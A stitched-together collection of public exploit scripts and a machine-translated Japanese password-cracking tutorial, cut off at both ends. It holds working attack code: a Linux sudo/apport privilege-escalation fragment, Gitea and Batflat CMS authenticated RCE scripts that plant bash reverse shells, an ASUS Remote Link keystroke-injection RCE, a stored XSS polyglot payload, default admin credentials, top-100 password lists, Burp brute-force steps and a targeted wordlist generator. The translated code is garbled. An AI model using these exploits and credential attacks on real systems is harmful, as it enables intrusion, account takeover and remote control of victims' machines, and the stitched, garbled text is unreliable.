>/dev/null & killall -SIGSEGV ./decoy echo "[+] Decoy process created" SUDO_PATH=`which sudo` ln -s $SUDO_PATH "linkchange" python3 -c "import os; os.rename('./linkchange', 'a\rUid: 0\rGid: 0')" echo "[+] symlink to sudo created" ./exploit $DECOY_CRASH_PATH rm $DECOY_CRASH_PATH sleep 5 if [ -f "/etc/logrotate.d/core" ] ; then echo "[*] Exploit succesfully finished" else echo "[*] Exploit failed" fi # Kill the sudo process after second apport finished kill `ps -ef | grep "sudo -S sud" | grep -v grep | awk '{print $2}'` ##

# Exploit Title: Gitea 1.12.5 - Remote Code Execution (Authenticated) # Date: 17 Feb 2020 # Exploit Author: Podalirius # PoC demonstration article: https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/ # Vendor Homepage: https://gitea.io/ # Software Link: https://dl.gitea.io/ # Version: >= 1.1.0 to <= 1.12.5 # Tested on: Ubuntu 16.04 with GiTea 1.6.1 #!/usr/bin/env python3 # -*- coding: utf-8 -*- import argparse import os import pexpect import random import re import sys import time import requests requests.packages.urllib3.disable_warnings() requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' try: requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' except AttributeError: pass class GiTea(object): def __init__(self, host, verbose=False): super(GiTea, self).__init__() self.verbose = verbose self.host = host self.username = None self.password = None self.uid = None self.session = None def _get_csrf(self, url): pattern = 'name="_csrf" content="([a-zA-Z0-9\-\_=]+)"' csrf = [] while len(csrf) == 0: r = self.session.get(url) csrf = re.findall(pattern, r.text) time.sleep(1) csrf = csrf[0] return csrf def _get_uid(self, url): pattern = 'name="_uid" content="([0-9]+)"' uid = re.findall(pattern, self.session.get(url).text) while len(uid) == 0: time.sleep(1) uid = re.findall(pattern, self.session.get(url).text) uid = uid[0] return int(uid) def login(self, username, password): if self.verbose == True: print(" [>] login('%s', ...)" % username) self.session = requests.Session() r = self.session.get('%s/user/login' % self.host) self.username = username self.password = password # Logging in csrf = self._get_csrf(self.host) r = self.session.post( '%s/user/login?redirect_to=%%2f%s' % (self.host, self.username), data = {'_csrf':csrf, 'user_name':username, 'password':password}, allow_redirects=True ) if b'Username or password is incorrect.' in r.content: return False else: # Getting User id self.uid = self._get_uid(self.host) return True def repo_create(self, repository_name): if self.verbose == True: print(" [>] Creating repository : %s" % repository_name) csrf = self._get_csrf(self.host) # Create repo r = self.session.post( '%s/repo/create' % self.host, data = { '_csrf' : csrf, 'uid' : self.uid, 'repo_name' : repository_name, 'description' : "Lorem Ipsum", 'gitignores' : '', 'license' : '', 'readme' : 'Default', 'auto_init' : 'off' } ) return None def repo_delete(self, repository_name): if self.verbose == True: print(" [>] Deleting repository : %s" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings' % (self.host, self.username, repository_name)) # Delete repository r = self.session.post( '%s/%s/%s/settings' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'action' : "delete", 'repo_name' : repository_name } ) return def repo_set_githook_pre_receive(self, repository_name, content): if self.verbose == True: print(" [>] repo_set_githook_pre_receive('%s')" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name)) # Set pre receive git hook r = self.session.post( '%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'content' : content } ) return def repo_set_githook_update(self, repository_name, content): if self.verbose == True: print(" [>] repo_set_githook_update('%s')" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name)) # Set update git hook r = self.session.post( '%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'content' : content } ) return def repo_set_githook_post_receive(self, repository_name, content): if self.verbose == True: print(" [>] repo_set_githook_post_receive('%s')" % repository_name) csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name)) # Set post receive git hook r = self.session.post( '%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name), data = { '_csrf' : csrf, 'content' : content } ) return def logout(self): if self.verbose == True: print(" [>] logout()") # Logging out r = self.session.get('%s/user/logout' % self.host) return None def trigger_exploit(host, username, password, repository_name, verbose=False): # Create a temporary directory tmpdir = os.popen('mktemp -d').read().strip() os.chdir(tmpdir) # We create some files in the repository os.system('touch README.md') rndstring = ''.join([hex(random.randint(0,15))[2:] for k in range(32)]) os.system('echo "%s" >> README.md' % rndstring) os.system('git init') os.system('git add README.md') os.system('git commit -m "Initial commit"') # Connect to remote source repository os.system('git remote add origin %s/%s/%s.git' % (host, username, repository_name)) # Push the files (it will trigger post-receive git hook) conn = pexpect.spawn("/bin/bash -c 'cd %s && git push -u origin master'" % tmpdir) conn.expect("Username for .*: ") conn.sendline(username) conn.expect("Password for .*: ") conn.sendline(password) conn.expect("Total.*") print(conn.before.decode('utf-8').strip()) return None def header(): print(""" _____ _ _______ / ____(_)__ __| CVE-2020-14144 | | __ _ | | ___ __ _ | | |_ | | | |/ _ \/ _` | Authenticated Remote Code Execution | |__| | | | | __/ (_| | \_____|_| |_|\___|\__,_| GiTea versions >= 1.1.0 to <= 1.12.5 """) if __name__ == '__main__': header() parser = argparse.ArgumentParser(description='Process some integers.') parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Increase verbosity.') parser.add_argument('-t','--target', required=True, type=str, help='Target host (http://..., https://... or domain name)') parser.add_argument('-u','--username', required=True, type=str, default=None, help='GiTea username') parser.add_argument('-p','--password', required=True, type=str, default=None, help='GiTea password') parser.add_argument('-I','--rev-ip', required=False, type=str, default=None, help='Reverse shell listener IP') parser.add_argument('-P','--rev-port', required=False, type=int, default=None, help='Reverse shell listener port') parser.add_argument('-f','--payload-file', required=False, default=None, help='Path to shell script payload to use.') args = parser.parse_args() if (args.rev_ip == None or args.rev_port == None): if args.payload_file == None: print('[!] Either (-I REV_IP and -P REV_PORT) or (-f PAYLOAD_FILE) options are needed') sys.exit(-1) # Read specific payload file if args.payload_file != None: f = open(args.payload_file, 'r') hook_payload = ''.join(f.readlines()) f.close() else: hook_payload = """#!/bin/bash\nbash -i >& /dev/tcp/%s/%d 0>&1 &\n""" % (args.rev_ip, args.rev_port) if args.target.startswith('http://'): pass elif args.target.startswith('https://'): pass else: args.target = 'https://' + args.target print('[+] Starting exploit ...') g = GiTea(args.target, verbose=args.verbose) if g.login(args.username, args.password): reponame = 'vuln' g.repo_delete(reponame) g.repo_create(reponame) g.repo_set_githook_post_receive(reponame, hook_payload) g.logout() trigger_exploit(g.host, g.username, g.password, reponame, verbose=args.verbose) g.repo_delete(reponame) else: print('\x1b[1;91m[!]\x1b[0m Could not login with these credentials.') print('[+] Exploit completed !')

###弱いパスワードの定義 弱いパスワードには、厳格で正確な定義はありません。通常、他の人が簡単に推測できるパスワード（あなたをよく知っているかもしれない）またはひび割れのツールによってひび割れていると考えられています。弱いパスワードには、「123」、「ABC」などの単純な数字と文字のみを含むパスワードを参照してください。そのようなパスワードは他のパスワードが簡単に割れてしまうため、ユーザーのインターネットアカウントを他の人に制御するため、ユーザーはそれらを使用することをお勧めしません。 ###弱いパスワードの原因 これは個人的な習慣と意識に関連するはずです。パスワードの忘れを避けるために、非常に簡単に覚えやすいパスワードを使用するか、システムのデフォルトパスワードなどを直接使用します。セキュリティ認識は十分ではありません。私はいつも誰も私の弱いパスワードを推測しないと思います。私は十分なセキュリティ認識を持っていません。私はいつも誰も私の弱いパスワードを推測しないと思います。 ###弱いパスワードの危険 システムの弱いパスワードを介して、システム制御の許可はハッカーによって直接取得できます。 ###廃棄物パスワードソリューション 強制すべての管理システムアカウントのパスワード強度は、特定のレベルに達する必要があります。 Simple Adminや123456などの弱いパスワードを使用することはできません。パスワードを複雑なパスワードに変更して暗号化して保存します。パスワードには、上限と小文字と小文字の文字、データ、特別な記号が含まれ、パスワードの長さは8桁以上であることをお勧めします。ウェブサイトにデータリークの脆弱性がある場合（SQLインジェクションの脆弱性など）、脆弱性を修正する必要があります。 通常、パスワードを設定すると、次の原則に従います。 （1）空のパスワードやシステムのデフォルトパスワードを使用しないでください。これらのパスワードはよく知られており、典型的な弱いパスワードです。 （2）パスワードの長さは8文字以上です。 （3）パスワードは、連続文字（たとえば：AAAAAAAA）または特定の文字の組み合わせ（たとえば：TZF.TZF。）であってはなりません。 （4）パスワードは、次の4つのタイプの文字、大文字（A-Z）、小文字（A-Z）、数字（0-9）、特殊文字の組み合わせである必要があります。クラスの各文字には、少なくとも1つが含まれています。特定の文字に1つしか含まれていない場合、文字は最初のキャラクターでもテールキャラクターであってはなりません。 （5）パスワードには、生年月日、記念日の日付、ログイン名、電子メールアドレスなど、自分に関する関連情報、および辞書の単語が含まれてはなりません。 （6）パスワードは、特定の文字を数字またはシンボルに置き換える単語であってはなりません。 （7）パスワードは覚えやすく、すぐに入力できる必要があり、他の人があなたの後ろからの入力を簡単に見ることができないようにします。 （8）未発見の侵入者がパスワードの使用を継続するのを防ぐために、少なくとも90日間はパスワードを1回変更します。 ### Wulnerパスワード分類 公共の弱いパスワード パブリックの弱いパスワードは一般的なパスワードです。公共の弱いパスワードは、多数のパスワードデータ統計に基づいて高頻度で表示される弱いパスワードです。この点で、パスワード統計が弱いため、多くの結果があります。ここでは、より高い頻度でいくつかの公共の弱いパスワードをリストします： （トップ100）： 123456 A123456 123456a 5201314 111111Woaini1314 QQ123456 123123 000000 1QAZ2WSX 1Q2W3E4R QWE123 7758521 123QWE A123123 123456AA Woaini520 Woaini 100200 1314520 Woaini123 123321 Q123456 123456789 123456789A 5211314 ASD123 A123456789 Z123456 ASD123456 A5201314 AA123456 AA123456 Zhang123 APTX4869 123123A 1Q2W3E4R5T 1QAZXSW2 5201314A 1Q2W3E AINI1314 31415926 Q1W2E3R4 123456QQ Woaini521 1234QWER A111111520520 ILOVEYOU ABC123 110110 11111A 123456ABC W123456 7758258 123QWEASD 159753 QWER1234 A000000 QQ123123 ZXC123 123654 ABC123456 123456Q QQ5201314 12345678 00000A 456852 AS123456 1314521 112233 521521 QAZWSX123 ZXC123456 ABCD1234 ASDASD 666666 love1314 qaz123 aaa123 q1w2e3 aaaaaa a123321 123000 1111111111112qwaszx5845201314 S123456 NIHAO123 CAONIMA123 ZXCVBNM123 WANG123 159357 1A2B3C4D ASDASD123 584520 753951 147258 1123581321 110120 QQ1314520 ウェブサイトの背景については、一般的に次のようになります。 管理者 マネージャー admin123 admin888 Admin666 具体的には、バックグラウンドタイプが異なると、パスワードが弱いとは異なります。 データベース（phpmyadmin）：アカウント：root、password：root、root123、123456 Tomcat：アカウント番号：admin、tomcat、Manager、Password：admin、tomcat、admin123、123456、マネージャー jboss：アカウント番号：管理者、jboss、マネージャー、パスワード：管理者、jboss、マネージャー、123456 weblogic：account：weblogic、admin、manager、password：weblogic、admin、manager、123456 条件型 個人の弱いパスワードは、多くの場合、その人の個人情報（名前、誕生日、携帯電話番号、特別なニックネーム、趣味、ソーシャルソフトウェアアカウント、一般的に使用されているユーザー名、電子メール.）、関係メンバー（家族、ボーイフレンド、ガールフレンド.）、環境（ライセンスプレート番号、会社名、会社の設立時間または場所などの会社情報、会社ドメインなど）、特別な指定キャラクターなどに関連付けられています。ここでは、いくつかの一般的な組み合わせもリストします。このパスワード推測Webサイトを使用して、条件付き弱いパスワード辞書を生成できます。 たとえば、私たちが人を知っている場合、彼の情報は次のとおりです。 名前：Wang Xiaoerメール：412391882@qq.com 英語名：Twowang携帯電話番号：110 次に、このウェブサイトにこの情報を入力して、以下の「送信」をクリックします 次に、この可能性の高いパスワードを取得します。 また、リマインダー:パスワードの組み合わせに大文字が含まれている必要がある場合、中国のパスワード設定習慣に従って、83％が大文字を入れ、唯一の既存の大文字を最初に置きます。 ###廃棄物パスワードの実現 たとえば、このようなコードを使用して、特定のシステムの背景をシミュレートする弱いパスワードの脆弱性を実証します。 ？php 関数showform（）{？ form method='post' action='。/lesspass.php' 入力型='テキスト' name='un' / 入力型='パスワード' name='pw' / 入力タイプ='送信'値='ログイン' / /form？php } $ un=@$ _ post ['un']; $ pw=@$ _ post ['pw']; if（$ un=='' $ pw==''） showform（）; else if（$ un=='admin' $ pw=='admin888'） echo 'ログインに正常に'; それ以外{ showform（）; エコー「ログインが失敗した」; } 展開後、lesspass.phpとして保存し、http://LocalHost/lessPass.phpにアクセスします。 次に、実際のパスワードを知らないふりをして試してみます。管理者アカウントの場合、ユーザー名は一般に管理者であり、パスワードはAdmin、Admin123、Admin888、123456、123Abcadminなどです。 その後、AdminおよびAdmin123、または失敗します。最後に、私はAdminとAdmin888を試しましたが、成功しました。 まず、ブラウザとバーププロキシを構成し、バープの傍受モードをオンにする必要があります。その後、lesspass.phpページに何かを入力して送信します。あなたはげっぷで傍受されたパケットを見ることができます： パスワードを爆発させるには、その侵入者機能を使用し、右クリックしてメニューをポップアップし、「侵入者への送信」を選択する必要があります。 次に、侵入者のタブページにアクセスし、Position subtabページでパケットを見ることができます。 すべてのマークをクリアするには、右側のクリアボタンをクリックする必要があります。パスワードをクラックする必要があるため、パスワードパラメーター値を選択し、[追加]をクリックします。 その後、その横の[ペイロード]タブに切り替え、中央の[読み込み]ボタンをクリックして、辞書をロードします。以前のTOP100.TXTを選択します。 Admin888を挿入することを忘れないでください。下の入力ボックスにadmin888を入力し、[次の追加]をクリックします。 右上隅の攻撃を開始するには、爆発を開始します（古いバージョンは侵入者です - 攻撃メニューバーを開始）、結果のリストが表示されます。 長さのヘッダーをクリックして、長さで並べ替えます。長さとは大きく異なるアイテムがあることがわかり、正しい結果です。 ダブルクリックPKAV HTTP Fuzzer 1.5.6.exeを開く。さらに、ディレクトリにはユーザーマニュアル、PKAV HTTP FuzzerユーザーマニュアルVer 1.0.pdfもあります。このマニュアルを参照できます。このチュートリアルでは、使用される機能についてのみ説明します そのメインインターフェイスは次のようなものです。 左側には「リクエストパッケージ」入力ボックスがあります。 httpパケット（つまり、burpのプロキシ - インターセプトタブにあるもの）コピーします。次に、PWの位置で管理者を選択し、以下の「マークの追加」をクリックします。 右側の「リプレイ設定」を見てみましょう。 「リプレイモード」と「バリエーション割り当て」を変更する必要はありません。下の[インポート]ボタンをクリックし、以前のTOP100.TXTを選択します。 次に、[追加]ボタンの右側にある入力ボックスにadmin888を入力し、[追加]をクリックします。 次に、下の[銀行家]タブをクリックし、新しいインターフェイスで「開始」をクリックします。 次に、「長さ」ヘッダーをクリックして、長さで並べ替えます。 パスワードがadmin888で長さが6であり、他の値が他の値である場合にのみ、正しいパスワードであることがわかります。 ###弱いパスワードの脆弱性の説明 通常、他の人が容易に推測するパスワード（彼らはあなたをよく知っているかもしれません）またはひび割れのツールによってひび割れたパスワードは弱いパスワードであると考えられています。一般的な弱いパスワードは次のとおりです。 1.数字または文字が連続または混合されているように配置されているため、キーボード文字は連続して配置されます（123456、ABCDEF、123ABC、QWERTY、1QAZ2WSXなど）。 2。誕生日、名前+誕生日（ソーシャルワーカーにひびを入れるのはとても簡単です） 3。フレーズパスワード（5201314、Woaini1314など） ### wrailパスワード生成 パスワード生成の弱いことに関して、関連するツールまたはスクリプトを使用できます。インターネットには多くのツールがあり、自分で検索してダウンロードできます。ここで私は自分自身を書いた小さなPythonスクリプトを提供します。必要な場合は、自分で変更してください。参照のみ： ＃ - * - coding: utf-8-* - weak_password=['000000'、 '0000000'、 '111111'、 '11111111'、 '112233'、 '123123'、 '123321'、 '123456'、 '12345678' '' 、 '87654321'、 '123456789'、 '987654321'、 '1234567890'、 '0123456789'、 '654321'、 '666666'、 '888888'、 '66888'、 '6 6668888 '、' abcdef '、' 147258369 '、' abcabc '、' abc123 '、' a1b2c3 '、' aaa111 '、' 123qwe '、' qweasd '、' admin '、' root '、' pass123 '、' p@ssword '、' password '、' passwd '、' iloveyou '、' woaini '、' 5201314 '、' qq123456 '、' taobao '、' wang1234 ']] foreign_weak_password=['password'、 '123456'、 '12345678'、 'qwerty'、 'abc123'、 'monkey'、 '1234567'、 'letmein '、' Trustno1 '、' Dragon '、' Baseball '、' 111111 '、' iloveyou '、' Master '、' Sunshine '、' Ashley '、' Bailey '、' passw0rd '、' Shadow '、' 123123 '、' 654321 '、' Superman '、' qazwsx '、' Michael '、' Football '、' qwerty '、' welcome '、' holly '、' happy '、' anty '、' abcabcabc '、' commintorator '、' commintorator '、' commintorator '、' commintorator name=['xiaoming'、 'xiaoming'、 'xiaoming'、 'xiao_ming'、 'xiaom'、 'xming'、 'xming'、 'xming'、 'xl'、 'xm']] Birth=['1995'、 '_ 1995'、 '09'、 '9'、 '23'、 '199509'、 '_ 950923'、 '_ 199509'、 '9509'、 '0923'、 '199509'、 '0923'、 '19950925'] SpecialNum=['1314'、 '520'、 '000'、 '111'、 '123'、 '168'、 '1234'、 '123456'、 '5201314'、 '888'、 '666'、 '123123'] id=['mingxiaozi'、 'xiaolifidao']] companyinfo=['jingdong'、 'jongdong'、 'jd'、 'jd']] ＃自分で詳細を説明してください f=open（ 'weakpasswords.txt'、 'w'） in beaw_password:の場合 f.write（a+'\ n'） forience_weak_password:のbの場合 f.write（b+'\ n'） name:のCの場合 出生:のDの場合 f.write（c+d+'\ n'） f.write（d+c+'\ n'） name:のeの場合 SpecialNum:のFの場合 f.write（e+f+'\ n'） f.write（f+e+'\ n'） ID:のI1の場合 出生:のB1の場合 f.write（i1+b1+'\ n'） f.write（b1+i1+'\ n'） ID:のI2の場合 SpecialNum:のS1の場合 f.write（i2+s1+'\ n'） f.write（s1+i2+'\ n'） n1 n1 n1:の場合 出生:のB1の場合 s2 inの場合 SpecialNum: f.write（n1+s2+b1+'\ n'） f.write（s2+n1+b1+'\ n'） f.write（s2+b1+n1+'\ n'） ＃自分でより多くの組み合わせ ###弱いパスワードのヒント 1。特定のルールに従って、簡単に読む、または私たちが若い頃に最初に接触した数字または文字の一部を読みます。 123456、123ABC、ABC123、123456ABCDEF！@＃これらの弱いパスワードはローラーキーボードとも呼ばれると冗談を言う人もいます。たとえば、admin！@＃は単純に見えませんが、実際にローラーキーボードであり、パスワードが弱いです。実際の侵入管理者でこの弱いパスワードに何度も遭遇しました！@＃防衛戦略：企業従業員にセキュリティトレーニングを提供して、セキュリティ認識を向上させます。セキュリティには運がありません。キーボードタイプのパスワードを使用すると、困難なパスワードを使用してみてください。 2。パスワードの漏れにつながる、または簡単に推測される可能性のある意図しない情報漏れは、白人憎しみの想像力に疑問を抱かないでください。彼らがCTFを行うとき、彼らは大きなアイデアを持っています。中国のサブサイトの弱いパスワード：lujiaji（voidance著者:blast）https://www.secpulse.com/archives/14056.htmla brief reak、このパスワードは典型的な弱いパスワードではありません。推測のみに依存している場合、成功することができない場合があります。しかし、ポイントは、あるニュースでは、ニュース著者のルジアジが表示され、管理バックエンドアカウントのパスワードがルジアジであるということです。したがって、壊れている理由は2つあります。一部またはすべてのユーザー名が一般に公開されています。管理者：Lujiajiのユーザー名とパスワードは同じです。 jd.comからのいくつかの機密情報は、Github（脆弱性著者：匿名）https://www.secpulse.com/archives/22828.htmlに漏れていました。もう1つのことは、パスワード自体が弱くないことですが、開発者は自分のウェブサイトまたはシステムがあまりにも好きで、ユーザー名またはパスワードが推測可能になることです。たとえば、Webサイトがwww.p1a2s3s4word.comの場合、開発者または管理者は、システムのユーザー名をWebサイトドメイン名または会社名に設定できます。例：P1A2S3S4WORD、P1A2S3S4WORD123 XIAOMIイントラネットローミングノート（弱いパスワードはさまざまな内部システムを漏らします）：XIAOMI11（脆弱性著者:臨時労働者） 対処戦略：（1）。ログイン名とユーザー名を区別する必要があります （2）。パスワードがユーザー名やまったく同じ状況を含めることを防ぐために、効果的なパスワードポリシーを実装します。 （3）githubは暗黙のセキュリティの主要な源であることを忘れないでください （4）。ビジネス名やドメイン名からパスワード情報を簡単に取得できるパスワードを使用しないでください。 3.パスワードの強度は信頼できますが、多数のシステムが同じパスワードを使用しています

# Exploit Title: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting # Date: 2021-02-16 # Exploit Author: Anmol K Sachan # Vendor Homepage: https://www.peel.fr/ # Software Link: https://sourceforge.net/projects/peel-shopping/ # Software: PEEL SHOPPING 9.3.0 # Vulnerability Type: Stored Cross-site Scripting # Vulnerability: Stored XSS # Tested on Windows 10 XAMPP # This application is vulnerable to Stored XSS vulnerability. # Vulnerable script: http://localhost/peel-shopping_9_3_0/achat/achat_maintenant.php # Vulnerable parameters: 'Comments / Special Instructions :' # Payload used: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e # POC: in the same page where we injected payload refresh the page. # You will see your Javascript code (XSS) executed.

# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution (Authenticated) # Date: 2020-12-27 # Exploit Author: mari0x00 # Vendor Homepage: https://batflat.org/ # Software Link: https://github.com/sruupl/batflat/archive/master.zip # Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/ # Version: <= 1.3.6 # CVE: CVE-2020-35734 #!/usr/bin/python3 import requests import sys import re from bs4 import BeautifulSoup from termcolor import colored from time import sleep print(colored('''###########################################################''',"red")) print(colored('''####### Batflat authenticated RCE by mari0x00 #######''',"red")) print(colored('''###########################################################''',"red")) print("") if len(sys.argv) != 6: print((colored("[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>","red"))) print((colored("[~] Default credentials: admin/admin","red"))) print((colored("[~] Example: python3 batpwnd.py http://192.168.101.105/ admin admin 192.168.101.101 4444","red"))) exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] IP = sys.argv[4] PORT = sys.argv[5] #Start session s = requests.Session() headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} #Authenticate print((colored("[+] Attempting user login","blue"))) login_data = { "username": username, "password": password, "login": "", } login = s.post(url+"admin/", login_data, headers=headers) sleep(0.5) #Get token print((colored("[+] Retrieving the token","blue"))) r = s.get(url+"admin/", headers=headers).content soup = BeautifulSoup(r, "lxml") token = (re.search(r't=(.*?)">Add', str(soup)).group(1)) print((colored("[+] Token ID: " + token,"blue"))) sleep(0.5) #Get URL print((colored("[+] Getting the add-user endpoint URL","blue"))) r = s.get(url+"admin/users/add?t="+token, headers=headers).content soup = BeautifulSoup(r, "lxml") add_user_url = (re.search(r'action="(.*?)"', str(soup)).group(1)) sleep(0.5) #Exploit print((colored("[+] Adding pwnd user","blue"))) payload = "<?php system(\"/bin/bash -c 'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1'\");?>" add_user = { "username": (None, "pwnd"), "fullname": (None, payload), "description": (None, "pwnd"), "email": (None, "pwnd@evil.com"), "password": (None, "pwnd123"), "access[]": (None, "users"), "save": (None, "Save") } exploit = s.post(add_user_url, headers=headers, files=add_user) sleep(0.5) #Triggering reverse shell print("") print((colored("[+] Triggering the shell. Go nuts!","green"))) r = s.get(url+"admin/users/manage?t="+token, headers=headers)

# Exploit: ASUS Remote Link 1.1.2.13 - Remote Code Execution # Date: 24-02-2021 # Exploit Author: H4rk3nz0 # Vendor Homepage: http://asus.com/ # Software Link: http://remotelink.asus.com/ # Version: 1.1.2.13 # Tested on: Windows 10 Enterprise Build 17763 # CVE: N/A #!/usr/bin/python import socket from time import sleep import sys port = 5665 target = socket.socket(socket.AF_INET, socket.SOCK_STREAM) prefix = "04020b02" suffix = "0000020000000000000000000300000000000000000004000000000000000000010000" enter = (prefix + ("0" * 1038)).decode("hex") string_prefix = "04020b0200000000010000" string_suffix = "0" * 1022 pre_command = "04000b0200000000".decode("hex") user_declare = ("02028a0000000000000057696e646f777320446566656e646572" + "0" * 224).decode("hex") # Declares Connection Source as 'Windows Defender' # ASCII to Hex Character List characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} # User Specified arguments try: rhost = "192.168.1.93" lhost = sys.argv[2] payload = sys.argv[3] except: print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>") exit() # HandShake Packets to Smart Gesture Server def Handshake(): target.connect((rhost,port)) target.sendto("b2".decode("hex"),(rhost,port)) target.sendto("38323538".decode("hex"),(rhost,port)) target.sendto("03000f0000000000".decode("hex"),(rhost,port)) target.sendto("03020f000000000003310000000000".decode("hex"),(rhost,port)) target.sendto("02008a0000000000".decode("hex"),(rhost,port)) target.sendto(user_declare,(rhost,port)) sleep(0.1) def MoveMouse(): for i in range(0,16): target.sendto("0000330038040006".decode("hex"),(rhost,port)) target.sendto(("00013300380400060101db010000c502" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101d0010000ca02" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101c7010000ce02" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101bd010000d202" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101b2010000d502" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101a6010000d802" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010199010000db02" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601018d010000de02" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010180010000e002" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010171010000e402" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010163010000e602" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010154010000e902" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010146010000eb02" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601013b010000ed02" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601012d010000f002" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010120010000f302" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010113010000f702" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010107010000fa02" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101fa000000fd02" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101f10000000003" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101e50000000303" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101d90000000603" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101ce0000000903" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101c20000000d03" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101b60000001103" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101ab0000001403" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101a00000001803" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101950000001c03" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101890000002003" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601017e0000002403" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101740000002703" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601016c0000002a03" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101650000002c03" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601015c0000002f03" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601015c0000003003" + suffix).decode("hex"),(rhost,port)) target.sendto(("000233003804000601005c0000003003" + suffix).decode("hex"),(rhost,port)) sleep(0.6) # Sends Left Click Input (Occasional Delay for some Reason) def LeftClick(): target.sendto("0000330038040006".decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0002330038040006010016020000e502" + suffix).decode("hex"),(rhost,port)) sleep(4) # Send Enter/Return Key Input def SendReturn(): target.sendto(pre_command,(rhost,port)) sleep(0.2) target.sendto(enter,(rhost,port)) # Enter/Return Key # Send String Characters def SendString(string): for char in string: convert = characters[char] final_string = string_prefix + convert + string_suffix target.sendto(pre_command,(rhost,port)) 